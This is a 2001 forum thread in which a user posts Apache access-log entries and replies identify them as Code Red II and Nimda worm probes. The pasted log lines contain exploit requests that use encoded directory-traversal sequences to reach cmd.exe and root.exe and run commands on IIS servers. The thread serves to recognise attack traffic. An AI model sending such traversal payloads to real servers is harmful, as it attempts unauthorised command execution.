access_log (from Apache) says:

tazmandevil

Registered
in my apache "access_log" i always have some stupid entries like that:

194.230.143.50 - - [21/Sep/2001:13:20:28 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.143.50 - - [21/Sep/2001:13:20:30 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
194.230.143.50 - - [21/Sep/2001:13:20:31 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:33 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
194.230.143.50 - - [21/Sep/2001:13:20:34 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:35 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:36 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
194.230.143.50 - - [21/Sep/2001:13:20:38 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
194.230.143.50 - - [21/Sep/2001:13:20:39 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:40 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
194.230.143.50 - - [21/Sep/2001:13:20:42 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:43 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
194.230.143.50 - - [21/Sep/2001:13:20:44 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.143.50 - - [21/Sep/2001:13:20:46 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
194.230.138.40 - - [22/Sep/2001:00:53:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
194.230.138.40 - - [22/Sep/2001:00:53:44 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274


is that a virus-client, searching for a trojan of this codered thing? (good luck i don't have a PC..... it's incredible, how quick, fast and often such requests come to me!.... i don't understand how such a frequency is possible...i'm just a usual User, have no permanent server or something!.... is that going around the world on every PC?... where is it come from?)
 
That's certainly what it looks like. Code Red II copies cmd.exe into the scripts folder [a default folder that has execute privledges set] as root.exe. There are some new nasty viruses out that I havn't studied up on, but it all looks like virus activity to me. No worries, it's all anti-micro$oft :)
 
that is the W32/Nimda@MM virus. it only affects NT/W2k servers...so you should not worry. the only thing it will do is slow down the response of your server by asking for file that are not present.
until the windows people fix their servers you will continue to see these "file requests" in your logs.
 
Back
Top